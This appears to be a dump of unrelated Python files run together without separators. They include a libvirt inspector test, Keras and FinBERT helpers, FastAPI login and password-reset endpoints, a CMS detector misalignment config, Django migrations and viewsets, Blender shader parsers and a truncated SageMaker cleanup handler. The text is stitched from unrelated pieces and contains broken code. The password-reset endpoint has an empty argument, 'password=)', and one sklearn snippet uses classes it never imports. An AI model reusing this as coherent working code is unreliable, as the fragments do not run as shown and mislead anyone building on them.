libvirt_inspector.LibvirtInspector() libvirt_inspector.libvirt = mock.Mock() @mock.patch('ceilometer.compute.virt.libvirt.inspector.' 'LibvirtInspector._get_connection', mock.Mock(return_value=None)) def test_init_error(self): self.assertRaises(virt_inspector.NoSanityException, self.inspector.check_sanity) @mock.patch('ceilometer.compute.virt.libvirt.inspector.' 'LibvirtInspector._get_connection', mock.Mock(side_effect=virt_inspector.NoDataException)) def test_init_exception(self): self.assertRaises(virt_inspector.NoDataException, self.inspector.check_sanity) Empythy/geometry-learningmodel/topoml_util/LoggerCallback.py import pprint from keras.callbacks import Callback import random from datetime import datetime import numpy as np pp = pprint.PrettyPrinter() class EpochLogger(Callback): def __init__(self, input_func=None, target_func=None, predict_func=None, aggregate_func=None, sample_size=3, stdout=False, input_slice=lambda x: x[0:1], target_slice=lambda x: x[1:2]): super().__init__() self.input_func = input_func self.target_func = target_func self.predict_func = predict_func self.aggregate_func = aggregate_func self.sample_size = sample_size self.log_to_stdout = stdout self.input_slice = input_slice self.target_slice = target_slice def on_epoch_end(self, epoch, logs=None): random.seed(datetime.now()) sample_indexes = random.sample(range(len(self.validation_data[0])), self.sample_size) inputs = np.array(self.input_slice(self.validation_data)) targets = np.array(self.target_slice(self.validation_data)) input_samples = [inputs[:, sample_index] for sample_index in sample_indexes] target_samples = [targets[:, sample_index] for sample_index in sample_indexes] predictions = [] for sample_index in sample_indexes: sample = inputs[:, sample_index:sample_index + 1] predictions.append(self.model.predict([*sample])) print('\nLogging output for %i inputs, targets and predictions...' % len(predictions)) for (inputs, targets, predictions) in zip(input_samples, target_samples, predictions): if self.log_to_stdout: print('Input:') pp.pprint(inputs) print('Target:') pp.pprint(targets) print('Prediction:') pp.pprint(predictions) print('') if self.aggregate_func: self.aggregate_func( (self.input_func(inputs), self.target_func(targets), self.predict_func(predictions))) mannamman/newsCrawl0 from finBERT.finbert.finbert import predict from transformers import AutoModelForSequenceClassification import os import json from typing import Dict class FinBert: def __init__(self): # 실행한 디렉토리 기준으로 상대경로를 입력 self.path = "finBERT/models/sentiment" self.model = AutoModelForSequenceClassification.from_pretrained(self.path, num_labels=3,cache_dir=None) self.labels = ["positive", "negative", "neutral"] def _make_dic(self, text, logit): return_dic = { "sentence" : text, } for label, val in zip(self.labels, logit): return_dic[label] = val return return_dic def pred(self, text: str) -> Dict[str,any]: text = text.replace('"', "'") res = json.loads(predict(text, self.model, self.path).to_json(orient='records'))[0] return self._make_dic(text, res["logit"]) if(__name__ == "__main__"): fin = FinBert() fin.pred("Inflation at 40-year high pressures consumers, Fed and Biden")1-10 from sklearn.datasets import fetch_20newsgroups categories = [ 'alt.atheism', 'sci.space', ] remove = ('headers', 'footers', 'quotes') data_train = fetch_20newsgroups(subset='train', categories=categories, remove=remove) data_test = fetch_20newsgroups(subset='test', categories=categories, remove=remove) X_train, y_train = data_train.data, data_train.target X_test, y_test = data_test.data, data_test.target len(X_train) len(X_test) from sklearn.linear_model import Ridge log_reg_tfid = Pipeline([ ('vectorizer', TfidfVectorizer(stop_words="english")), ('classifier', LogisticRegression(solver='liblinear', random_state=42)), ]) log_reg_tfid.fit(X_train, y_train) log_reg_tfid.score(X_train, y_train) log_reg_tfid.score(X_test, y_test) feature_names = log_reg_tfid["vectorizer"].get_feature_names() fig, ax = plt.subplots(figsize=(15, 6)) plot_important_features(log_reg_tfid["classifier"].coef_.ravel(), feature_names, top_n=20, ax=ax) # -*- coding: utf-8 -*- """ Login API endpoints. """ from datetime import timedelta import typing as tp from fastapi import APIRouter from fastapi import Body from fastapi import Depends from fastapi.security import OAuth2PasswordRequestForm from app.api.utils.storage import get_uow from app.api.utils.security import get_current_user from app.core import config from app.core.jwt import create_access_token from app.crud.core import UnitOfWork from app.db.models.user import User as DBUser from app.exceptions import APIError from app.models.message import Message from app.models.token import Token from app.models.user import User from app.models.user import UserUpdate from app.models.user import UserInDB from app.utils.security import generate_password_reset_token from app.utils.security import verify_password_reset_token from app.utils.email import send_password_reset_email router = APIRouter() @router.post("/login/access-token", response_model=Token) async def login_access_token( *, form_data: OAuth2PasswordRequestForm = Depends(), uow: UnitOfWork = Depends(get_uow) ) -> tp.Mapping[str, str]: """OAuth2 compatible token login. Acquires an access token to be used for future requests. Parameters ---------- form_data : OAuth2PasswordRequestForm The OAuth2 request form data to use. uow : UnitOfWork The unit of work object to use. Returns ------- Mapping[str, str] A mapping of access token data. Raises ------ APIException If the user could not be logged or is not an active user. """ user = uow.user.authenticate(form_data.username, form_data.password) if not user: raise APIError("Invalid username or password") elif not user.is_active: raise APIError("Inactive user") access_token_expires = timedelta( minutes=config.ACCESS_TOKEN_EXPIRE_MINUTES ) access_token = create_access_token( {"user_id": user.uid}, expires_delta=access_token_expires ) return {'accessToken': access_token, 'tokenType': "bearer"} @router.post("/login/test-token", response_model=User) async def test_token( *, current_user: UserInDB = Depends(get_current_user) ) -> DBUser: """Tests the given authentication token for validity. Parameters ---------- current_user : UserInDB The current user to test the token for. Returns ------- User The user with the valid token. """ return current_user @router.post('/password-recovery/{email}', response_model=Message) async def recover_password( email: str, *, uow: UnitOfWork = Depends(get_uow) ) -> tp.Mapping[str, str]: """Send a password recovery email to the user. Parameters ---------- email : str The email address to send a password recovery email for. uow : UnitOfWork The unit of work object to use. Returns ------- Mapping[str, str] The message from the password recovery result. """ user = uow.user.get_by_email(email) if user: password_reset_token = generate_password_reset_token(email=email) send_password_reset_email( email_to=user.email, email=email, token=password_reset_token ) return {"value": "Password recovery email sent."} @router.post("/reset-password/", response_model=Message) async def reset_password( *, token: str = Body(...), new_password: str = Body(...), uow: UnitOfWork = Depends(get_uow) ) -> tp.Mapping[str, str]: """Resets a user's password from the given reset token. Parameters ---------- token : str The password reset token to use. new_password : str The new, plaintext password to set. uow : UnitOfWork The unit of work object to use. Returns ------- Mapping[str, str] The message from the password reset result. Raises ------ APIException If the token isn't valid, or the user associated is not an active user. ObjectNotFoundException If the user specified by the decoded token does not exist. """ email = verify_password_reset_token(token) if not email: raise APIError("Invalid token.") user = uow.user.get_by_email(email, raise_ex=True) if not uow.user.is_active(user): raise APIError("Inactive user.") updated_user = UserUpdate(password=) with uow: uow.user.update(user, updated_user) return {"value": "Password updated successfully"} 100-1000 from __future__ import print_function import FWCore.ParameterSet.Config as cms import FWCore.ParameterSet.VarParsing as VarParsing import copy, sys, os process = cms.Process("Misaligner") ################################################################### # Setup 'standard' options ################################################################### options = VarParsing.VarParsing() options.register('myScenario', "MisalignmentScenario_PhaseI_PseudoAsymptotic", # default value VarParsing.VarParsing.multiplicity.singleton, # singleton or list VarParsing.VarParsing.varType.string, # string, int, or float "scenario to apply") options.register('mySigma', -1, # default value VarParsing.VarParsing.multiplicity.singleton, # singleton or list VarParsing.VarParsing.varType.float, # string, int, or float "sigma for random misalignment in um") options.register('inputDB', None, # default value VarParsing.VarParsing.multiplicity.singleton, # singleton or list VarParsing.VarParsing.varType.string, # string, int, or float "input database file to override GT (optional)") options.parseArguments() ################################################################### # Message logger service ################################################################### process.load("FWCore.MessageService.MessageLogger_cfi") process.MessageLogger.cout = cms.untracked.PSet( threshold = cms.untracked.string('INFO'), default = cms.untracked.PSet( limit = cms.untracked.int32(10000000) ) ) # replace MessageLogger.debugModules = { "*" } # service = Tracer {} ################################################################### # Ideal geometry producer and standard includes ################################################################### process.load('Configuration.Geometry.GeometryRecoDB_cff') ################################################################### # Just state the Global Tag (and pick some run) ################################################################### process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff') from Configuration.AlCa.GlobalTag import GlobalTag # process.GlobalTag = GlobalTag(process.GlobalTag, "auto:run2_design", "") process.GlobalTag = GlobalTag(process.GlobalTag, "auto:phase1_2017_design", "") print("Using global tag:", process.GlobalTag.globaltag.value()) ################################################################### # This uses the object from the tag and applies the misalignment scenario on top of that object ################################################################### process.load("Alignment.CommonAlignmentProducer.AlignmentProducer_cff") process.AlignmentProducer.doMisalignmentScenario=True process.AlignmentProducer.applyDbAlignment=True process.AlignmentProducer.checkDbAlignmentValidity=False #otherwise error thrown for IOV dependent GTs import Alignment.TrackerAlignment.Scenarios_cff as scenarios if hasattr(scenarios, options.myScenario): print("Using scenario:", options.myScenario) print(" with sigma:", options.mySigma) print() process.AlignmentProducer.MisalignmentScenario = getattr(scenarios, options.myScenario) else: print("----- Begin Fatal Exception -----------------------------------------------") print("Unrecognized",options.myScenario,"misalignment scenario !!!!") print("Aborting cmsRun now, please check your input") print("----- End Fatal Exception -------------------------------------------------") sys.exit(1) sigma = options.mySigma if sigma > 0: process.AlignmentProducer.MisalignmentScenario.scale = cms.double(0.0001*sigma) # shifts are in cm if options.inputDB is not None: process.GlobalTag.toGet.extend([ cms.PSet( connect = cms.string("sqlite_file:"+options.inputDB), record = cms.string("TrackerAlignmentRcd"), tag = cms.string("Alignments") ), cms.PSet( connect = cms.string("sqlite_file:"+options.inputDB), record = cms.string("TrackerAlignmentErrorExtendedRcd"), tag = cms.string("AlignmentErrorsExtended") ) ]) process.AlignmentProducer.saveToDB=True process.AlignmentProducer.saveApeToDB=True ################################################################### # Output name ################################################################### outputfilename = None scenariolabel = str(options.myScenario) if sigma > 0: scenariolabel = scenariolabel+str(sigma) outputfilename = "geometry_"+str(scenariolabel)+"__from_" if options.inputDB is None: outputfilename += process.GlobalTag.globaltag.value()+".db" else: outputfilename += options.inputDB ################################################################### # Source ################################################################### process.source = cms.Source("EmptySource") process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(1)) ################################################################### # Database output service ################################################################### from CondCore.CondDB.CondDB_cfi import * process.PoolDBOutputService = cms.Service( "PoolDBOutputService", CondDB, timetype = cms.untracked.string("runnumber"), toPut = cms.VPSet( cms.PSet( record = cms.string("TrackerAlignmentRcd"), tag = cms.string("Alignments") ), cms.PSet( record = cms.string("TrackerAlignmentErrorExtendedRcd"), tag = cms.string("AlignmentErrorsExtended") ), ) ) process.PoolDBOutputService.connect = "sqlite_file:"+outputfilename process.PoolDBOutputService.DBParameters.messageLevel = 2 server/pyfol/shape_predict/func/src/color_recognition_api/color_histogram_feature_extraction.py import os import cv2 import numpy as np this_path = str(os.path.split(__file__)[0]) def color_histogram_of_test_image(test_src_image): # load the image chans = cv2.split(test_src_image) colors = ('b', 'g', 'r') features = [] feature_data = '' counter = 0 for (chan, color) in zip(chans, colors): counter = counter + 1 hist = cv2.calcHist([chan], [0], None, [256], [0, 256]) features.extend(hist) # find the peak pixel values for R, G, and B elem = np.argmax(hist) if counter == 1: blue = str(elem) elif counter == 2: green = str(elem) elif counter == 3: red = str(elem) feature_data = red + ',' + green + ',' + blue # print(feature_data) with open(this_path+'/test.data', 'w') as myfile: myfile.write(feature_data) def color_histogram_of_training_image(img_name): # detect image color by using image file name to label training data str_1 = img_name.split(this_path)[1] if 'red' in str_1: data_source = 'RED' elif 'yellow' in str_1: data_source = 'YELLOW' elif 'green' in str_1: data_source = 'GREEN' elif 'orange' in str_1: data_source = 'ORANGE' elif 'white' in str_1: data_source = 'WHITE' elif 'black' in str_1: data_source = 'BLACK' elif 'blue' in str_1: data_source = 'BLUE' elif 'purple' in str_1: data_source = 'PURPLE' elif 'brown' in str_1: data_source = 'BROWN' elif 'pink' in str_1: data_source = 'PINK' # load the image image = cv2.imread(img_name) chans = cv2.split(image) colors = ('b', 'g', 'r') features = [] feature_data = '' counter = 0 for (chan, color) in zip(chans, colors): counter = counter + 1 hist = cv2.calcHist([chan], [0], None, [256], [0, 256]) features.extend(hist) # find the peak pixel values for R, G, and B elem = np.argmax(hist) if counter == 1: blue = str(elem) elif counter == 2: green = str(elem) elif counter == 3: red = str(elem) feature_data = red + ',' + green + ',' + blue with open(this_path+'/training.data', 'a') as myfile: myfile.write(feature_data + ',' + data_source + '\n') def training(): color = ['red', 'yellow', 'green', 'orange', 'white', 'black', 'blue', 'brown', 'pink', 'purple'] for c in color: # Please check your own path if you got error from color_path # Using os.getcwd() for check the real path # color_path = os.path.join('..', 'color_training_dataset', c) for fluke color_path = os.path.join(this_path,'color_training_dataset', c) # print(color_path) for file in os.listdir(color_path): file_path = os.path.join(color_path, file) # print(file_path) color_histogram_of_training_image(file_path) Scripts/archive_bsa.py #! python3 import sys import re import os.path import shutil import util import bsa_rules import subprocess def ArchiveBSA(target_folder, bsa_filename): script_path = util.GetScriptPath() utilities_path = util.GetUtilitiesPath() archive_original = os.path.join(utilities_path, "Archive.exe") util.LogDebug("Copy Archive.exe to target folder") archive = os.path.join(target_folder, "Archive.exe") shutil.copy2(archive_original, archive) log_basename = "log.txt" log_filename = os.path.join(target_folder, log_basename) config_basename = "bsa_config.txt" config_filename = os.path.join(target_folder, config_basename) allFilesList = [] checks = {} util.LogInfo("Build File List") totalFileSizeTally = 0 target_data = os.path.join(target_folder, "Data") util.LogDebug("Walking the target directory " + target_data) for root, subdirs, files in os.walk(target_data): util.LogDebug('--\nroot = ' + root) if root == target_data: util.LogDebug("subdirs: " + str(subdirs)) lower_case_data_list = [x.lower() for x in subdirs] util.LogDebug("lcds: " + str(lower_case_data_list)) if "meshes" in lower_case_data_list: util.LogDebug("found meshes") checks["Retain Strings During Startup"] = True checks["Meshes"] = True if "textures" in lower_case_data_list: util.LogDebug("found texttures") checks["Textures"] = True if "interface" in lower_case_data_list: util.LogDebug("found interface") checks["Menus"] = True if "music" in lower_case_data_list: util.LogDebug("found music") checks["Retain File Names"] = True checks["Sounds"] = True if "sound" in lower_case_data_list: util.LogDebug("found sound") sound_list = os.listdir(os.path.join(target_data, "sound")) sound_list_lower = [x.lower() for x in sound_list] if "fx" in sound_list_lower: util.LogDebug("found sound//fx") checks["Retain File Names"] = True checks["Sounds"] = True if "voice" in sound_list_lower: util.LogDebug("found sound//voice") checks["Voices"] = True if "shadersfx" in lower_case_data_list: util.LogDebug("found shaders") checks["Shaders"] = True if "seq" in lower_case_data_list: util.LogDebug("found seq") checks["Retain File Names"] = True checks["Misc"] = True if "grass" in lower_case_data_list: util.LogDebug("found grass") checks["Retain File Names"] = True checks["Misc"] = True if "scripts" in lower_case_data_list: util.LogDebug("found scripts") checks["Retain File Names"] = True checks["Misc"] = True else: for filename in files: if filename != "desktop.ini": file_path = os.path.join(root, filename) relative_path = file_path.replace(target_folder, '') util.LogDebug('\t- file %s (relative path: %s)' % (filename, relative_path)) path_no_data = relative_path[6:] file_size = os.path.getsize(file_path) totalFileSizeTally += file_size util.LogDebug("totalFileSizeTally is now: " + str(totalFileSizeTally)) allFilesList.append( {'FileName': filename, 'FilePath': file_path, 'RelativePath': relative_path, 'PathNoData': path_no_data, 'FileSize':file_size} ) SizeLimitBSA = bsa_rules.BSASizeLimit currentFileIndex = None currentFileSizeTally = 0 buffer = '' bsaFileWritten = [] bsa_original_filename = bsa_filename def WrtiteBSA(): nonlocal currentFileIndex, buffer, bsa_filename util.LogDebug("Writing BSA with filelist:<" + buffer + ">") filelist_basename = "bsa_filelist.txt" if currentFileIndex != None: filelist_basename = "bsa_filelist" + str(currentFileIndex) + ".txt" bsa_filename = bsa_original_filename[:-4] + str(currentFileIndex) + ".bsa" currentFileIndex += 1 filelist_filename = os.path.join(target_folder, filelist_basename) with open(filelist_filename, 'w') as filelist_file: filelist_file.write(buffer) buffer = '' util.LogInfo("Build Config") checksOrder = ["Meshes", "Textures", "Menus", "Sounds", "Voices", "Shaders", "Trees", "Fonts", "Misc", "Compress Archive", "Retain Directory Names", "Retain File Names", "Retain File Name Offsets", "Retain Strings During Startup", "XBox 360 Archive", "Embed File Names"] with open(config_filename, 'w') as config_file: config_file.write("Log: " + log_basename + "\n") config_file.write("New Archive\n") for check in checksOrder: if check in checks: config_file.write("Check: " + check + "\n") config_file.write("Set File Group Root: Data\\\n") config_file.write("Add File Group: " + filelist_basename + "\n") config_file.write("Save Archive: " + bsa_filename + "\n") util.LogInfo("Run Archive.exe") commandLine = ["Archive.exe", config_basename] os.chdir(target_folder) util.RunCommandLine(commandLine) with open(log_filename, "r") as log_file: for line in log_file: util.LogDebug(line) os.remove(log_filename) os.remove(filelist_filename) os.remove(config_filename) bsaFileWritten.append({"Folder":target_folder, "FileName":bsa_filename}) if totalFileSizeTally > SizeLimitBSA: currentFileIndex = 0 totalWrittenTally = 0 for fileInfo in allFilesList: file_size = fileInfo['FileSize'] newTally = currentFileSizeTally + file_size totalWrittenTally = totalWrittenTally + file_size util.LogDebug("Adding " + fileInfo['FileName'] + " currentFileSizeTally is " + str(currentFileSizeTally) + " file_size is " + str(file_size) + " totalWrittenTally is " + str(totalWrittenTally)) buffer += fileInfo['PathNoData'] + "\n" currentFileSizeTally += file_size if (newTally >= SizeLimitBSA) or (totalWrittenTally >= totalFileSizeTally): WrtiteBSA() currentFileSizeTally = 0 if buffer != '': util.LogWarn("BUFFER NOT EMPTY!") util.LogInfo("Clean Up") util.RemoveFile(archive) os.chdir(script_path) return bsaFileWritten if __name__ == '__main__': target_folder = sys.argv[1] origin_folder = sys.argv[2] bsa_basename = os.path.basename(origin_folder) + ".bsa" bsa_basename = bsa_basename.replace(" ", "") bsa_filename = os.path.join(target_folder, bsa_basename) util.InitialiseLog(bsa_filename + ".log") util.StartTimer() ArchiveBSA(target_folder, bsa_basename) util.EndTimer()from dataclasses import dataclass, field from enum import Enum from typing import Optional __NAMESPACE__ = "NISTSchema-SV-IV-atomic-unsignedLong-enumeration-1-NS" class NistschemaSvIvAtomicUnsignedLongEnumeration1Type(Enum): VALUE_235157797394 = 235157797394 VALUE_2841737 = 2841737 VALUE_6246890837920823 = 6246890837920823 VALUE_502437096339080 = 502437096339080 VALUE_475868893660 = 475868893660 VALUE_69228431818957325 = 69228431818957325 VALUE_16 = 16 @dataclass class NistschemaSvIvAtomicUnsignedLongEnumeration1: class Meta: name = "NISTSchema-SV-IV-atomic-unsignedLong-enumeration-1" namespace = "NISTSchema-SV-IV-atomic-unsignedLong-enumeration-1-NS" value: Optional[NistschemaSvIvAtomicUnsignedLongEnumeration1Type] = field( default=None, metadata={ "required": True, } ) # Generated by Django 4.0.4 on 2022-05-05 18:26 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('EmployeeApp', '0004_rename_employeeapp_employee'), ] operations = [ migrations.RenameModel( old_name='Departments', new_name='Department', ), ] fann1993814/hanlperceptron import hanlperceptron # Load model model_path = '../data/' segmenter = hanlperceptron.Segmenter(model_path+'large/cws.bin') postager = hanlperceptron.POSTagger(model_path+'pku1998/pos.bin') nerecognizer = hanlperceptron.NERecognizer(model_path+'pku1998/ner.bin') text = '大西洋和太平洋' # Combine with CoreDictionary and Perceptron seg_res = segmenter.segment(text) pos_res = postager.tagging(seg_res) ner_res = nerecognizer.recognize(seg_res, pos_res) print(seg_res) print(pos_res) print(ner_res) # Only use Perceptron seg_res = segmenter._segment(text) pos_res = postager._tagging(seg_res) print(seg_res) print(pos_res) #!/usr/bin/env python3 from rofm.classes import Roll def display_roll(roll: Roll): low, mid, high = roll.get_drop_groups() s_low = "" if not low else "({}) ".format(" ".join(str(v) for v in low)) s_mid = " ".join(str(v) for v in mid) s_high = "" if not high else " ({})".format(" ".join(str(v) for v in high)) return "[{}{}{}] -> {}".format(s_low, s_mid, s_high, roll.value()) discordbot/utils/private.py TOPGG = { "TOKEN": "" } DISCORD = { "TOKEN": "", "DEVS": [612109647649832998], # your discord ID in here "BOT_ID": 867989642866208869, # bot discord ID here # a channel ID of your choice for these "STATISTICS_CHANNEL": 803809978469056542, "STACK_CHANNEL": 803809978469056542, "BACKUP_CHANNEL": 803809978469056542, "BUG_REPORT_CHANNEL": 803809978469056542, "ERROR_CHANNEL": 803809978469056542 } mneia_admin_export/utils.py0 from pathlib import Path from django.template.loader import render_to_string def export_sitemap_index(models): export_file = Path.home() / "Code/mneia-gr.github.io/sitemap.xml" template_file = "mneia_admin_export/sitemap-index.xml" html = render_to_string(template_file, {"models": [model.get_model_slug_plural() for model in models]}) export_file.write_text(html) 0 from django.shortcuts import get_object_or_404 from django_filters.rest_framework import DjangoFilterBackend from djoser.views import UserViewSet from rest_framework import (filters, mixins, permissions, response, status, viewsets) from rest_framework.decorators import action from .serializers_follow import FollowSerializer, FollowViewSerializer from recipe_features.models import Follow from recipe_features.pagination_hub import CustomResultsSetPagination from recipe_features.permissions import CurrentUserOrAdminOrReadOnly from users.models import User class CustomUserViewSet(UserViewSet): """Provides work with user and his profile depending on permission and role """ queryset = User.objects.all() permission_classes = [permissions.IsAuthenticated] filter_backends = (filters.SearchFilter,) search_fields = ("username",) pagination_class = CustomResultsSetPagination filter_backends = (DjangoFilterBackend, filters.SearchFilter) @action( detail=True, methods=['GET', 'DELETE'], url_path="subscribe", permission_classes=[CurrentUserOrAdminOrReadOnly], pagination_class=None ) def subscribe(self, request, id): if request.method == 'DELETE': return self.unsubscribe(request, id) user = self.request.user.id author = get_object_or_404(User, id=id) data = {'user': user, 'author': id} serializer = FollowSerializer( data=data, context={'request': request}) serializer.is_valid(raise_exception=True) serializer.save(user=self.request.user, author=author) return response.Response(FollowViewSerializer( author, context={'request': request}).data, status=status.HTTP_201_CREATED) def unsubscribe(self, request, pk): subscribtion = get_object_or_404( Follow, user=request.user, author=pk) subscribtion.delete() return response.Response( status=status.HTTP_204_NO_CONTENT) class FollowListSet(mixins.ListModelMixin, viewsets.GenericViewSet): pagination_class = CustomResultsSetPagination serializer_class = FollowViewSerializer permission_classes = [permissions.IsAuthenticated] def get_queryset(self): return User.objects.filter(following__user=self.request.user) # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('mainapp', '0021_auto_20150531_1904'), ] operations = [ migrations.AddField( model_name='bill', name='price_per_minute', field=models.DecimalField(default=19, max_digits=12, decimal_places=2), preserve_default=False, ), ] import bpy import arm.log as log import arm.material.cycles as c import arm.material.cycles_functions as c_functions from arm.material.parser_state import ParserState from arm.material.shader import floatstr, vec3str def parse_brightcontrast(node: bpy.types.ShaderNodeBrightContrast, out_socket: bpy.types.NodeSocket, state: ParserState) -> vec3str: out_col = c.parse_vector_input(node.inputs[0]) bright = c.parse_value_input(node.inputs[1]) contr = c.parse_value_input(node.inputs[2]) state.curshader.add_function(c_functions.str_brightcontrast) return 'brightcontrast({0}, {1}, {2})'.format(out_col, bright, contr) def parse_gamma(node: bpy.types.ShaderNodeGamma, out_socket: bpy.types.NodeSocket, state: ParserState) -> vec3str: out_col = c.parse_vector_input(node.inputs[0]) gamma = c.parse_value_input(node.inputs[1]) return 'pow({0}, vec3({1}))'.format(out_col, gamma) def parse_huesat(node: bpy.types.ShaderNodeHueSaturation, out_socket: bpy.types.NodeSocket, state: ParserState) -> vec3str: state.curshader.add_function(c_functions.str_hue_sat) hue = c.parse_value_input(node.inputs[0]) sat = c.parse_value_input(node.inputs[1]) val = c.parse_value_input(node.inputs[2]) fac = c.parse_value_input(node.inputs[3]) col = c.parse_vector_input(node.inputs[4]) return f'hue_sat({col}, vec4({hue}-0.5, {sat}, {val}, 1.0-{fac}))' def parse_invert(node: bpy.types.ShaderNodeInvert, out_socket: bpy.types.NodeSocket, state: ParserState) -> vec3str: fac = c.parse_value_input(node.inputs[0]) out_col = c.parse_vector_input(node.inputs[1]) return f'mix({out_col}, vec3(1.0) - ({out_col}), {fac})' def parse_mixrgb(node: bpy.types.ShaderNodeMixRGB, out_socket: bpy.types.NodeSocket, state: ParserState) -> vec3str: col1 = c.parse_vector_input(node.inputs[1]) col2 = c.parse_vector_input(node.inputs[2]) # Store factor in variable for linked factor input if node.inputs[0].is_linked: fac = c.node_name(node.name) + '_fac' state.curshader.write('float {0} = {1};'.format(fac, c.parse_value_input(node.inputs[0]))) else: fac = c.parse_value_input(node.inputs[0]) # TODO: Do not mix if factor is constant 0.0 or 1.0? blend = node.blend_type if blend == 'MIX': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) elif blend == 'ADD': out_col = 'mix({0}, {0} + {1}, {2})'.format(col1, col2, fac) elif blend == 'MULTIPLY': out_col = 'mix({0}, {0} * {1}, {2})'.format(col1, col2, fac) elif blend == 'SUBTRACT': out_col = 'mix({0}, {0} - {1}, {2})'.format(col1, col2, fac) elif blend == 'SCREEN': out_col = '(vec3(1.0) - (vec3(1.0 - {2}) + {2} * (vec3(1.0) - {1})) * (vec3(1.0) - {0}))'.format(col1, col2, fac) elif blend == 'DIVIDE': out_col = '(vec3((1.0 - {2}) * {0} + {2} * {0} / {1}))'.format(col1, col2, fac) elif blend == 'DIFFERENCE': out_col = 'mix({0}, abs({0} - {1}), {2})'.format(col1, col2, fac) elif blend == 'DARKEN': out_col = 'min({0}, {1} * {2})'.format(col1, col2, fac) elif blend == 'LIGHTEN': out_col = 'max({0}, {1} * {2})'.format(col1, col2, fac) elif blend == 'OVERLAY': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'DODGE': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'BURN': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'HUE': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'SATURATION': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'VALUE': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'COLOR': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'SOFT_LIGHT': out_col = '((1.0 - {2}) * {0} + {2} * ((vec3(1.0) - {0}) * {1} * {0} + {0} * (vec3(1.0) - (vec3(1.0) - {1}) * (vec3(1.0) - {0}))));'.format(col1, col2, fac) elif blend == 'LINEAR_LIGHT': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix # out_col = '({0} + {2} * (2.0 * ({1} - vec3(0.5))))'.format(col1, col2, fac_var) else: log.warn(f'MixRGB node: unsupported blend type {node.blend_type}.') return col1 if node.use_clamp: return 'clamp({0}, vec3(0.0), vec3(1.0))'.format(out_col) return out_col def parse_curvergb(node: bpy.types.ShaderNodeRGBCurve, out_socket: bpy.types.NodeSocket, state: ParserState) -> vec3str: fac = c.parse_value_input(node.inputs[0]) vec = c.parse_vector_input(node.inputs[1]) curves = node.mapping.curves name = c.node_name(node.name) # mapping.curves[0].points[0].handle_type return '(sqrt(vec3({0}, {1}, {2}) * vec3({4}, {5}, {6})) * {3})'.format( c.vector_curve(name + '0', vec + '.x', curves[0].points), c.vector_curve(name + '1', vec + '.y', curves[1].points), c.vector_curve(name + '2', vec + '.z', curves[2].points), fac, c.vector_curve(name + '3a', vec + '.x', curves[3].points), c.vector_curve(name + '3b', vec + '.y', curves[3].points), c.vector_curve(name + '3c', vec + '.z', curves[3].points)) def parse_lightfalloff(node: bpy.types.ShaderNodeLightFalloff, out_socket: bpy.types.NodeSocket, state: ParserState) -> floatstr: # https://github.com/blender/blender/blob/master/source/blender/gpu/shaders/material/gpu_shader_material_light_falloff.glsl return c.parse_value_input(node.inputs['Strength']) import numpy as np, random class Adversary: def __init__(self, w_star, X, model = "logistic", log_bias = None): self.w_star_ = w_star self.log_bias_ = log_bias self.a_star_reward = np.amax(self.log_bias_) self.best_arm = np.argmax(self.log_bias_) # multinomial # self.best_arm, self.a_star_reward = self.get_best_real_reward_multi() def get_adversary_reward(self, X): l = len(self.w_star_[X]) l2 = len(self.w_star_[self.best_arm]) idx = random.randint(0, l - 1) idx2 = random.randint(0, l2 - 1) rew = self.w_star_[X][idx] idx = np.unique(np.random.randint(100, size=1)) # idx2 = np.unique(np.random.randint(100, size=10)) # print self.w_star_[X], type(self.w_star_[X]) # print self.w_star_[X][idx] # rew = np.sum(self.w_star_[X][idx]) # print rew # reg = self.log_bias_[X] br = self.log_bias_[self.best_arm] rew = self.log_bias_[X] reg = br - rew # For multinomial # reg = self.a_star_reward - self.get_real_reward_multi(X) return rew, reg def get_best_real_reward_multi(self): best = 0 br = 0.0 for i in range(32): cr = self.get_real_reward_multi(i) if cr > br: best = i br = cr return best, br def get_real_reward_multi(self, i): cr = 0.0 for j in range(7): cr += (j + 1) * self.log_bias_[i][j] return cr PyUnchained/books # Generated by Django 2.2.6 on 2020-01-27 04:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('books', '0013_auto_20200124_0732'), ] operations = [ migrations.AddField( model_name='doubleentry', name='related_document', field=models.FileField(blank=True, null=True, upload_to='double_entry_files'), ), ] jbnunn/sagemaker-battlesnake-ai0 #!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://www.apache.org/licenses/LICENSE-2.0 # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. import json import os import boto3 import requests from botocore.exceptions import ClientError def handler(event, context): try: operation = event['ResourceProperties']['Operation'] if operation == 'CleanupSagemakerBucket': if event['RequestType'] == 'Delete': bucketName = os.environ['SAGEMAKER_BUCKET_NAME'] s3 = boto3.resource('s3') try: bucket = s3.Bucket(bucketName) bucket.objects.filter(Prefix='battlesnake-aws/').delete() bucket.objects.filter(Prefix='battlesnake-mxnet/').delete() except ClientError as e: print('Bucket did not exist, skipping') print(e.response['Error']) elif operation == 'CleanupSagemakerEndpoint': if event['RequestType'] == 'Delete': deployment_name = 'battlesnake-endpoint' client = boto3.client('sagemaker') try: response = client.describe_endpoint_config(EndpointConfigName=deployment_name) model_name = response['ProductionVariants'][0]['ModelName'] client.delete_model(ModelName=model_name) client.delete_endpoint(EndpointName=deployment_name) 